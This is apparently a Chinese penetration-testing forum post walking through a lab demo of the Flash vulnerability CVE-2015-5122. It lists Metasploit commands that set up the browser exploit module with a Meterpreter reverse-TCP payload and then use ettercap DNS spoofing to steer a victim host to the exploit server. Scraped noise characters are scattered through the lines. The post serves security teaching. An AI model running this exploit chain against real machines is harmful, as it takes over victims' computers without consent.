9 L& H9 S) z" C- y" L3 H3 e) x 二、cve2015-5122漏洞实例演示虚拟机 $ B' Q9 u/ r2 r2 [6 [
0 v6 `) K& z: S+ y& O& q6 e1 Y6 |& f5 ?3 R2 X2 G8 e 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 2 F @0 |3 k4 i
% J; a |2 {' x search cve-2015-5122如图:
7 d5 |; O2 ~( L7 p) H5 i8 J
( q, J$ d* V% x. q
0 [( f* h* m/ I! u" ~6 D; d( u 下面我们敲如下命令:
6 h/ d- O D" {, d9 ~4 x! U4 fuse exploit/multi/browser/adobe_flash_opaque_background_uaf / `( h8 n# P4 t1 d/ r
1 ]7 c$ _1 K6 j4 t; v( H5 s8 k( a. k; o0 G9 j( w set PAYLOAD windows/meterpreter/reverse_tcp ; i2 D/ G6 R: }; }2 e |
4 D8 R4 y% o( D- D set LHOST 192.168.0.109
. y" R! s# O4 w$ B( K set URIPATH / /*根目录*/
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 0 W. E6 C& ~- S2 H0 Q) V N
& w8 P6 x+ J. t! j5 {0 ? set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 * d& C! {, {5 [; V
然后show options如图: : {% [) \; a+ ^
* v% m( {, b' g! t7 o: ]
) f7 R& l- P( Y3 G
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
# B+ ]& L8 d. t" l# {
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
- {+ r+ F5 f) [( i- V4 E
成功了,这时候我们断开ettercap,如图: % u7 }9 L0 h6 h; ^: L: C
$ Q" d3 g+ O* p4 c3 Y& z. r3 _; M. n3 Y: f; N
- }+ p- t3 o! ^7 }- B Screenshot如图: / m9 a$ g% |- L6 a; I; o. r: i
6 F/ s4 F; V+ `1 a+ Y7 h
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |